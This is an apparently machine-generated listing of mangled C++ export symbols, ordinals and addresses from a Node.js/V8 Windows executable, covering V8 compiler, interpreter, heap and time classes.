                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBVObject@01@@Z24690x140904200
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBVRepresentation@01@@Z24700x1408f32c0
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@AEBW4PropertyAttributes@01@@Z24710x1408f3370
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VBytecodeOffset@01@@Z24720x1407ba3a0
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VExternalReference@01@@Z24730x140bfac10
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VFeedbackSlot@01@@Z24740x1407ba3b0
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@VMachineType@01@@Z24750x140be0c00
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4DeoptimizeReason@01@@Z24760x140bb0640
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4FeedbackSlotKind@01@@Z24770x1409a8c50
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4FunctionId@Runtime@01@@Z24780x1407f0ad0
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4InstanceType@01@@Z24790x140904230
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4MachineRepresentation@01@@Z24800x140be0c80
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4PropertyCellType@01@@Z24810x140905ad0
                                                                                                                                                                                                                                    ??6internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV23@W4PropertyConstness@01@@Z24820x1408f3410
                                                                                                                                                                                                                                    ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVBytecodeNode@012@@Z24830x140a39770
                                                                                                                                                                                                                                    ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBVBytecodeSourceInfo@012@@Z24840x140a375e0
                                                                                                                                                                                                                                    ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4Bytecode@012@@Z24850x140a36290
                                                                                                                                                                                                                                    ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4ImplicitRegisterUse@012@@Z24860x140a38af0
                                                                                                                                                                                                                                    ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandScale@012@@Z24870x140a38ba0
                                                                                                                                                                                                                                    ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandSize@012@@Z24880x140a38c00
                                                                                                                                                                                                                                    ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4OperandType@012@@Z24890x140a38c70
                                                                                                                                                                                                                                    ??6interpreter@internal@v8@@YAAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AEAV34@AEBW4ToBooleanMode@BytecodeArrayBuilder@012@@Z24900x140a58fe0
                                                                                                                                                                                                                                    ??8?$MagicNumbersForDivision@I@base@v8@@QEBA_NAEBU012@@Z24910x141039390
                                                                                                                                                                                                                                    ??8?$MagicNumbersForDivision@_K@base@v8@@QEBA_NAEBU012@@Z24920x1412a0400
                                                                                                                                                                                                                                    ??8?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z24930x14057e3c0
                                                                                                                                                                                                                                    ??8?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z24940x14057e3c0
                                                                                                                                                                                                                                    ??8?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z24950x14057e3c0
                                                                                                                                                                                                                                    ??8BytecodeNode@interpreter@internal@v8@@QEBA_NAEBV0123@@Z24960x140a39790
                                                                                                                                                                                                                                    ??8CallInterfaceDescriptor@internal@v8@@QEBA_NAEBV012@@Z24970x14057e390
                                                                                                                                                                                                                                    ??8InstructionOperand@compiler@internal@v8@@QEBA_NAEAV0123@@Z24980x14057e3a0
                                                                                                                                                                                                                                    ??8Register@interpreter@internal@v8@@QEBA_NAEBV0123@@Z24990x14053b6d0
                                                                                                                                                                                                                                    ??8TimeDelta@base@v8@@QEBA_NAEBV012@@Z25000x14057e390
                                                                                                                                                                                                                                    ??8Type@compiler@internal@v8@@QEBA_NV0123@@Z25010x14057e3c0
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NAEBUConstFieldInfo@012@0@Z25020x14057e390
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NAEBUElementAccess@012@0@Z25030x1410d4a70
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NAEBUFieldAccess@012@0@Z25040x1410d4aa0
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NAEBUObjectAccess@012@0@Z25050x1410d4af0
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NAEBVIfValueParameters@012@0@Z25060x141039390
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NAEBVS128ImmediateParameter@012@0@Z25070x141051570
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NAEBVSLVerifierHintParameters@012@0@Z25080x1410393b0
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NULoadTransformParameters@012@0@Z25090x141051590
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NVAtomicLoadParameters@012@0@Z25100x1410515b0
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NVAtomicStoreParameters@012@0@Z25110x1410515e0
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NVStackSlotRepresentation@012@0@Z25120x141051610
                                                                                                                                                                                                                                    ??8compiler@internal@v8@@YA_NVStoreRepresentation@012@0@Z25130x141051630
                                                                                                                                                                                                                                    ??8internal@v8@@YA_NVExternalReference@01@0@Z25140x140bfac70
                                                                                                                                                                                                                                    ??9?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z25150x14057e3f0
                                                                                                                                                                                                                                    ??9?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z25160x14057e3f0
                                                                                                                                                                                                                                    ??9?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z25170x14057e3f0
                                                                                                                                                                                                                                    ??9BytecodeNode@interpreter@internal@v8@@QEBA_NAEBV0123@@Z25180x140a397e0
                                                                                                                                                                                                                                    ??9InstructionOperand@compiler@internal@v8@@QEBA_NAEAV0123@@Z25190x14057e3d0
                                                                                                                                                                                                                                    ??9Register@interpreter@internal@v8@@QEBA_NAEBV0123@@Z25200x14053b6e0
                                                                                                                                                                                                                                    ??9TimeDelta@base@v8@@QEBA_NAEBV012@@Z25210x140a24540
                                                                                                                                                                                                                                    ??9Type@compiler@internal@v8@@QEBA_NV0123@@Z25220x14057e3f0
                                                                                                                                                                                                                                    ??9iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA_NAEBV01234@@Z25230x140a53420
                                                                                                                                                                                                                                    ??9iterator@StateValuesAccess@compiler@internal@v8@@QEBA_NAEBV01234@@Z25240x1410dfa90
                                                                                                                                                                                                                                    ??A?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAAAEAPEAVMoveOperands@compiler@internal@v8@@_K@Z25250x14057e400
                                                                                                                                                                                                                                    ??A?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEBAAEBQEAVMoveOperands@compiler@internal@v8@@_K@Z25260x14057e400
                                                                                                                                                                                                                                    ??A?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAAAEAUCpuProfileDeoptFrame@v8@@_K@Z25270x14009a4e0
                                                                                                                                                                                                                                    ??A?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEBAAEBUCpuProfileDeoptFrame@v8@@_K@Z25280x14009a4e0
                                                                                                                                                                                                                                    ??A?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAAAEAUCpuProfileDeoptInfo@v8@@_K@Z25290x1400991c0
                                                                                                                                                                                                                                    ??A?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEBAAEBUCpuProfileDeoptInfo@v8@@_K@Z25300x1400991c0
                                                                                                                                                                                                                                    ??AInputs@Node@compiler@internal@v8@@QEBAPEAV1234@H@Z25310x14057e410
                                                                                                                                                                                                                                    ??AModificationScope@WasmImportWrapperCache@wasm@internal@v8@@QEAAAEAPEAVWasmCode@234@AEBUCacheKey@1234@@Z25320x140645370
                                                                                                                                                                                                                                    ??AWasmImportWrapperCache@wasm@internal@v8@@QEAAAEAPEAVWasmCode@123@AEBUCacheKey@0123@@Z25330x1406453a0
                                                                                                                                                                                                                                    ??DTimeDelta@base@v8@@QEBA?AV012@_J@Z25340x140ff18b0
                                                                                                                                                                                                                                    ??DUtf8Value@String@v8@@QEAAPEADXZ25350x140097290
                                                                                                                                                                                                                                    ??DUtf8Value@String@v8@@QEBAPEBDXZ25360x140097290
                                                                                                                                                                                                                                    ??DValue@String@v8@@QEAAPEAGXZ25370x140097290
                                                                                                                                                                                                                                    ??DValue@String@v8@@QEBAPEBGXZ25380x140097290
                                                                                                                                                                                                                                    ??Diterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA?AUJumpTableTargetOffset@234@XZ25390x140a53430
                                                                                                                                                                                                                                    ??Diterator@StateValuesAccess@compiler@internal@v8@@QEAA?AUTypedNode@1234@XZ25400x1410dfad0
                                                                                                                                                                                                                                    ??EBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@XZ25410x140a52e80
                                                                                                                                                                                                                                    ??EIterator@BitVector@internal@v8@@QEAAXXZ25420x14053b6f0
                                                                                                                                                                                                                                    ??Eiterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV01234@XZ25430x140a53450
                                                                                                                                                                                                                                    ??Eiterator@StateValuesAccess@compiler@internal@v8@@QEAAAEAV01234@XZ25440x1410dfb70
                                                                                                                                                                                                                                    ??FBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@XZ25450x140a52ed0
                                                                                                                                                                                                                                    ??G?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVThreadTicks@23@VTimeDelta@23@@Z25460x140ff18c0
                                                                                                                                                                                                                                    ??G?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VThreadTicks@23@@Z25470x140ff18f0
                                                                                                                                                                                                                                    ??G?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTime@23@VTimeDelta@23@@Z25480x140ff18c0
                                                                                                                                                                                                                                    ??G?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VTime@23@@Z25490x140ff18f0
                                                                                                                                                                                                                                    ??G?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeDelta@23@VTimeTicks@23@@Z25500x140ff18f0
                                                                                                                                                                                                                                    ??G?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeTicks@23@VTimeDelta@23@@Z25510x140ff18c0
                                                                                                                                                                                                                                    ??GTimeDelta@base@v8@@QEBA?AV012@AEBV012@@Z25520x140ff1900
                                                                                                                                                                                                                                    ??GTimeDelta@base@v8@@QEBA?AV012@XZ25530x140ff1910
                                                                                                                                                                                                                                    ??H?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA?AVThreadTicks@23@VTimeDelta@23@@Z25540x140ff1920
                                                                                                                                                                                                                                    ??H?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA?AVTime@23@VTimeDelta@23@@Z25550x140ff1920
                                                                                                                                                                                                                                    ??H?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA?AVTimeTicks@23@VTimeDelta@23@@Z25560x140ff1920
                                                                                                                                                                                                                                    ??HTimeDelta@base@v8@@QEBA?AV012@AEBV012@@Z25570x140ff1940
                                                                                                                                                                                                                                    ??KTimeDelta@base@v8@@QEBA?AV012@_J@Z25580x140ff1950
                                                                                                                                                                                                                                    ??KTimeDelta@base@v8@@QEBA_JAEBV012@@Z25590x140ff1970
                                                                                                                                                                                                                                    ??M?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z25600x140ff1980
                                                                                                                                                                                                                                    ??M?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z25610x140ff1980
                                                                                                                                                                                                                                    ??M?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z25620x140ff1980
                                                                                                                                                                                                                                    ??MRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z25630x14053b7d0
                                                                                                                                                                                                                                    ??MTimeDelta@base@v8@@QEBA_NAEBV012@@Z25640x140ff1990
                                                                                                                                                                                                                                    ??N?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z25650x140ff19a0
                                                                                                                                                                                                                                    ??N?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z25660x140ff19a0
                                                                                                                                                                                                                                    ??N?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z25670x140ff19a0
                                                                                                                                                                                                                                    ??NRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z25680x14053b7e0
                                                                                                                                                                                                                                    ??NTimeDelta@base@v8@@QEBA_NAEBV012@@Z25690x140ff19b0
                                                                                                                                                                                                                                    ??O?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z25700x140ff19c0
                                                                                                                                                                                                                                    ??O?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z25710x140ff19c0
                                                                                                                                                                                                                                    ??O?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z25720x140ff19c0
                                                                                                                                                                                                                                    ??ORegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z25730x14053b7f0
                                                                                                                                                                                                                                    ??OTimeDelta@base@v8@@QEBA_NAEBV012@@Z25740x140ff19d0
                                                                                                                                                                                                                                    ??P?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEBA_NVThreadTicks@23@@Z25750x140ff19e0
                                                                                                                                                                                                                                    ??P?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEBA_NVTime@23@@Z25760x140ff19e0
                                                                                                                                                                                                                                    ??P?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEBA_NVTimeTicks@23@@Z25770x140ff19e0
                                                                                                                                                                                                                                    ??PRegister@interpreter@internal@v8@@QEBA_NAEBV0123@@Z25780x14053b800
                                                                                                                                                                                                                                    ??PTimeDelta@base@v8@@QEBA_NAEBV012@@Z25790x140ff19f0
                                                                                                                                                                                                                                    ??RAstRawStringComparer@SourceTextModuleDescriptor@internal@v8@@QEBA_NPEBVAstRawString@23@0@Z25800x1408c9450
                                                                                                                                                                                                                                    ??RDeleteACHHandle@node@@QEBAXPEAUACHHandle@1@@Z25810x14029b2a0
                                                                                                                                                                                                                                    ??RFatalOutOfMemoryHandler@internal@cppgc@@QEBAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEBVSourceLocation@2@@Z25820x14050bb90
                                                                                                                                                                                                                                    ??RImportAssertionsKeyComparer@internal@v8@@QEBA_NPEBVAstRawString@12@0@Z25830x1408c9450
                                                                                                                                                                                                                                    ??RModuleRequestComparer@SourceTextModuleDescriptor@internal@v8@@QEBA_NPEBVAstModuleRequest@123@0@Z25840x140c6a580
                                                                                                                                                                                                                                    ??XTimeDelta@base@v8@@QEAAAEAV012@_J@Z25850x140ff1a00
                                                                                                                                                                                                                                    ??Y?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@VTimeDelta@23@@Z25860x140ff1a10
                                                                                                                                                                                                                                    ??Y?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@VTimeDelta@23@@Z25870x140ff1a10
                                                                                                                                                                                                                                    ??Y?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@VTimeDelta@23@@Z25880x140ff1a10
                                                                                                                                                                                                                                    ??YBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@H@Z25890x140a52f20
                                                                                                                                                                                                                                    ??YTimeDelta@base@v8@@QEAAAEAV012@AEBV012@@Z25900x140ff1a40
                                                                                                                                                                                                                                    ??Z?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@VTimeDelta@23@@Z25910x140ff1a50
                                                                                                                                                                                                                                    ??Z?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@VTimeDelta@23@@Z25920x140ff1a50
                                                                                                                                                                                                                                    ??Z?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@VTimeDelta@23@@Z25930x140ff1a50
                                                                                                                                                                                                                                    ??ZBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@H@Z25940x140a52f60
                                                                                                                                                                                                                                    ??ZTimeDelta@base@v8@@QEAAAEAV012@AEBV012@@Z25950x140ff1a80
                                                                                                                                                                                                                                    ??_0TimeDelta@base@v8@@QEAAAEAV012@_J@Z25960x140ff1a90
                                                                                                                                                                                                                                    ??_7?$Deserializer@VIsolate@internal@v8@@@internal@v8@@6B@25970x141864160
                                                                                                                                                                                                                                    ??_7?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@6B@25980x141867418
                                                                                                                                                                                                                                    ??_7?$SharedTurboAssemblerBase@VTurboAssembler@internal@v8@@@internal@v8@@6B@25990x141842e40
                                                                                                                                                                                                                                    ??_7?$basic_ios@DU?$char_traits@D@std@@@std@@6B@26000x141d5c240
                                                                                                                                                                                                                                    ??_7?$basic_ostream@DU?$char_traits@D@std@@@std@@6B@26010x141d5c250
                                                                                                                                                                                                                                    ??_7?$basic_streambuf@DU?$char_traits@D@std@@@std@@6B@26020x141d5c140
                                                                                                                                                                                                                                    ??_7AccountingAllocator@internal@v8@@6B@26030x141862a90
                                                                                                                                                                                                                                    ??_7ActivityControl@v8@@6B@26040x141f4b6a8
                                                                                                                                                                                                                                    ??_7AddTypeAssertionsReducer@compiler@internal@v8@@6B@26050x141d52cd0
                                                                                                                                                                                                                                    ??_7AllocationProfile@v8@@6B@26060x141f4b5e0
                                                                                                                                                                                                                                    ??_7Allocator@ArrayBuffer@v8@@6B@26070x141f4b728
                                                                                                                                                                                                                                    ??_7ArrayBufferAllocator@node@@6B@26080x141f4b870
                                                                                                                                                                                                                                    ??_7AsmCallableType@wasm@internal@v8@@6B@26090x14185d100
                                                                                                                                                                                                                                    ??_7AsmFunctionType@wasm@internal@v8@@6B@26100x14185d130
                                                                                                                                                                                                                                    ??_7AsmOverloadedFunctionType@wasm@internal@v8@@6B@26110x14185d160
                                                                                                                                                                                                                                    ??_7Assembler@internal@v8@@6B@26120x141846848
                                                                                                                                                                                                                                    ??_7AssemblerBase@internal@v8@@6B@26130x1418e0e88
                                                                                                                                                                                                                                    ??_7AsyncResource@node@@6B@26140x141765588
                                                                                                                                                                                                                                    ??_7AsyncStreamingDecoder@wasm@internal@v8@@6B@26150x14184ea40
                                                                                                                                                                                                                                    ??_7BaseSpace@internal@cppgc@@6B@26160x14183f800
                                                                                                                                                                                                                                    ??_7BaseSpace@internal@v8@@6B@26170x1418426d8
                                                                                                                                                                                                                                    ??_7BlockBuilder@interpreter@internal@v8@@6B@26180x1418a0ba8
                                                                                                                                                                                                                                    ??_7BoundedPageAllocator@base@v8@@6B@26190x141d400e0
                                                                                                                                                                                                                                    ??_7BranchElimination@compiler@internal@v8@@6B@26200x141d4d4f8
                                                                                                                                                                                                                                    ??_7BreakableControlFlowBuilder@interpreter@internal@v8@@6B@26210x1418a0ba0
                                                                                                                                                                                                                                    ??_7BytecodeIterator@wasm@internal@v8@@6B@26220x141846a40
                                                                                                                                                                                                                                    ??_7BytecodeRegisterOptimizer@interpreter@internal@v8@@6B@26230x1418a4180
                                                                                                                                                                                                                                    ??_7Cancelable@internal@v8@@6B@26240x141842650
                                                                                                                                                                                                                                    ??_7CancelableTask@internal@v8@@6BCancelable@12@@26250x1418638b0
                                                                                                                                                                                                                                    ??_7CancelableTask@internal@v8@@6BTask@2@@26260x1418638c0
                                                                                                                                                                                                                                    ??_7Channel@V8Inspector@v8_inspector@@6B@26270x14183a398
                                                                                                                                                                                                                                    ??_7CheckpointElimination@compiler@internal@v8@@6B@26280x141d4d530
                                                                                                                                                                                                                                    ??_7CodeEventHandler@v8@@6B@26290x1418f20e8
                                                                                                                                                                                                                                    ??_7CodeEventLogger@internal@v8@@6B@26300x141893ab0
                                                                                                                                                                                                                                    ??_7CodeGenerator@compiler@internal@v8@@6B@26310x141d4ba80
                                                                                                                                                                                                                                    ??_7CommandLineAPIScope@V8InspectorSession@v8_inspector@@6B@26320x14183a218
                                                                                                                                                                                                                                    ??_7CommonOperatorReducer@compiler@internal@v8@@6B@26330x141d4d568
                                                                                                                                                                                                                                    ??_7CompactionSpace@internal@v8@@6B@26340x141842a50
                                                                                                                                                                                                                                    ??_7CompilationEventCallback@wasm@internal@v8@@6B@26350x141842d88
                                                                                                                                                                                                                                    ??_7CompilationJob@internal@v8@@6B@26360x1418566f8
                                                                                                                                                                                                                                    ??_7CompilationResultResolver@wasm@internal@v8@@6B@26370x141846a50
                                                                                                                                                                                                                                    ??_7ConcurrentMarker@internal@cppgc@@6B@26380x14183f420
                                                                                                                                                                                                                                    ??_7ConcurrentMarkerBase@internal@cppgc@@6B@26390x14183fbf8
                                                                                                                                                                                                                                    ??_7ConcurrentMarkingVisitor@internal@cppgc@@6B@26400x14183f198
                                                                                                                                                                                                                                    ??_7ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@6B@26410x1418aeec8
                                                                                                                                                                                                                                    ??_7ConditionalControlFlowBuilder@interpreter@internal@v8@@6B@26420x1418a0bd0
                                                                                                                                                                                                                                    ??_7ConstantFoldingReducer@compiler@internal@v8@@6B@26430x141d542b8
                                                                                                                                                                                                                                    ??_7ContextDeserializer@internal@v8@@6B@26440x141864160
                                                                                                                                                                                                                                    ??_7ContextSerializer@internal@v8@@6B@26450x141867698
                                                                                                                                                                                                                                    ??_7ControlFlowBuilder@interpreter@internal@v8@@6B@26460x1418a0b98
                                                                                                                                                                                                                                    ??_7CppHeap@internal@v8@@6B02@@26470x1418af2f8
                                                                                                                                                                                                                                    ??_7CppHeap@internal@v8@@6BAllocationObserver@StatsCollector@1cppgc@@@26480x1418af300
                                                                                                                                                                                                                                    ??_7CppHeap@internal@v8@@6BHeapBase@1cppgc@@@26490x1418af2d8
                                                                                                                                                                                                                                    ??_7CppHeap@v8@@6B@26500x14183a218
                                                                                                                                                                                                                                    ??_7CsaLoadElimination@compiler@internal@v8@@6B@26510x141d4d5b8
                                                                                                                                                                                                                                    ??_7DateCache@internal@v8@@6B@26520x141870390
                                                                                                                                                                                                                                    ??_7DbgStreamBuf@internal@v8@@6B@26530x141842cf8
                                                                                                                                                                                                                                    ??_7DeadCodeElimination@compiler@internal@v8@@6B@26540x141d54368
                                                                                                                                                                                                                                    ??_7DefaultEmbedderRootsHandler@internal@v8@@6B@26550x1418a7178
                                                                                                                                                                                                                                    ??_7Delegate@ValueDeserializer@v8@@6B@26560x141f4b8b0
                                                                                                                                                                                                                                    ??_7Delegate@ValueSerializer@v8@@6B@26570x141f4b6e0
                                                                                                                                                                                                                                    ??_7DiscardedSamplesDelegate@v8@@6B@26580x141f4b860
                                                                                                                                                                                                                                    ??_7Domain@API@Schema@protocol@v8_inspector@@6B@26590x14183a5a0
                                                                                                                                                                                                                                    ??_7EmbedderGraph@v8@@6B@26600x141f4b918
                                                                                                                                                                                                                                    ??_7EmbedderHeapTracer@v8@@6B@26610x141f4b750
                                                                                                                                                                                                                                    ??_7EmbedderRootsHandler@v8@@6B@26620x141f4b690
                                                                                                                                                                                                                                    ??_7EscapeAnalysisReducer@compiler@internal@v8@@6B@26630x141d545d8
                                                                                                                                                                                                                                    ??_7Exported@protocol@v8_inspector@@6B@26640x14183a5a0
                                                                                                                                                                                                                                    ??_7Extension@v8@@6B@26650x141f4b8a0
                                                                                                                                                                                                                                    ??_7ExternalOneByteStringResource@String@v8@@6B@26660x141f4b608
                                                                                                                                                                                                                                    ??_7ExternalResourceVisitor@v8@@6B@26670x141f4b580
                                                                                                                                                                                                                                    ??_7ExternalSourceStream@ScriptCompiler@v8@@6B@26680x141f4b6a8
                                                                                                                                                                                                                                    ??_7ExternalStringResource@String@v8@@6B@26690x141f4b608
                                                                                                                                                                                                                                    ??_7ExternalStringResourceBase@String@v8@@6B@26700x141f4b590
                                                                                                                                                                                                                                    ??_7FlatStringReader@internal@v8@@6B@26710x141842678
                                                                                                                                                                                                                                    ??_7FreeListMany@internal@v8@@6B@26720x1418ae9f0
                                                                                                                                                                                                                                    ??_7FreeListManyCached@internal@v8@@6B@26730x1418aea38
                                                                                                                                                                                                                                    ??_7FreeListManyCachedFastPath@internal@v8@@6B@26740x141842710
                                                                                                                                                                                                                                    ??_7FreeListManyCachedOrigin@internal@v8@@6B@26750x141842758
                                                                                                                                                                                                                                    ??_7GCInvoker@internal@cppgc@@6B@26760x14183f990
                                                                                                                                                                                                                                    ??_7GraphAssembler@compiler@internal@v8@@6B@26770x141d4c9b0
                                                                                                                                                                                                                                    ??_7GraphReducer@compiler@internal@v8@@6B@26780x141d50778
                                                                                                                                                                                                                                    ??_7Heap@cppgc@@6B@26790x14183a218
                                                                                                                                                                                                                                    ??_7Heap@internal@cppgc@@6B02@@26800x14183f5f0
                                                                                                                                                                                                                                    ??_7Heap@internal@cppgc@@6BGarbageCollector@12@@26810x14183f5f8
                                                                                                                                                                                                                                    ??_7Heap@internal@cppgc@@6BHeapBase@12@@26820x14183f5d0
                                                                                                                                                                                                                                    ??_7HeapBase@internal@cppgc@@6B@26830x14183f878
                                                                                                                                                                                                                                    ??_7IdentityMapBase@internal@v8@@6B@26840x141842b80
                                                                                                                                                                                                                                    ??_7Inspectable@V8InspectorSession@v8_inspector@@6B@26850x14183a208
                                                                                                                                                                                                                                    ??_7InstantiationResultResolver@wasm@internal@v8@@6B@26860x141846a50
                                                                                                                                                                                                                                    ??_7IsolatePlatformDelegate@node@@6B@26870x141f4b640
                                                                                                                                                                                                                                    ??_7JSCallReducer@compiler@internal@v8@@6B@26880x141d4d620
                                                                                                                                                                                                                                    ??_7JSContextSpecialization@compiler@internal@v8@@6B@26890x141d4d650
                                                                                                                                                                                                                                    ??_7JSCreateLowering@compiler@internal@v8@@6B@26900x141d4d688
                                                                                                                                                                                                                                    ??_7JSGraphAssembler@compiler@internal@v8@@6B@26910x141d4c9b8
                                                                                                                                                                                                                                    ??_7JSIntrinsicLowering@compiler@internal@v8@@6B@26920x141d4d728
                                                                                                                                                                                                                                    ??_7JSNativeContextSpecialization@compiler@internal@v8@@6B@26930x141d556a8
                                                                                                                                                                                                                                    ??_7JSTypedLowering@compiler@internal@v8@@6B@26940x141d4d780
                                                                                                                                                                                                                                    ??_7JumpTableAssembler@wasm@internal@v8@@6B@26950x141842e70
                                                                                                                                                                                                                                    ??_7LargeObjectSpace@internal@v8@@6B@26960x141842898
                                                                                                                                                                                                                                    ??_7LargePageMemoryRegion@internal@cppgc@@6B@26970x14183ef60
                                                                                                                                                                                                                                    ??_7LargePageSpace@internal@cppgc@@6B@26980x14183f800
                                                                                                                                                                                                                                    ??_7LoadElimination@compiler@internal@v8@@6B@26990x141d4d7b0
                                                                                                                                                                                                                                    ??_7LoopBuilder@interpreter@internal@v8@@6B@27000x1418a0bb0
                                                                                                                                                                                                                                    ??_7MachineOperatorReducer@compiler@internal@v8@@6B@27010x141d4d7e0
                                                                                                                                                                                                                                    ??_7MacroAssembler@internal@v8@@6B@27020x141842e70
